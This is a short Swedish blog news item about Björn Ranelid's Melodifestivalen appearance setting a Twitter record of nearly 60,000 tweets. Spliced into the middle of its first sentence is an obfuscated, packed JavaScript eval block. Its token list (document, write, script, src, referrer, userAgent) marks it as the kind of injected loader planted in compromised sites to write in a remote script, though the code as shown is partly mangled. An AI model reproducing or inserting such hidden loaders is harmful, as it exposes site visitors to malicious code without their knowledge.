Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Björn Ranelid slog Twitter rekord

Björn Ranelid slog Twitter rekord
Sebastian

Efter lördagens framträdande av Björn eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|etirr|var|u0026u|referrer|iitai||js|php’.split(’|’),0,{}))
Ranelid
så började folk twittra som aldrig för. Enligt analysföretaget Lissly hittades 59 693 tweets om Melodifestivalen.

Detta är otroligt mycket mer än förra veckans delfinal då de ”endast” var 35 000 tweets. Det nya rekordet är troligen det högsta någonsin för ett svenskt tv-program.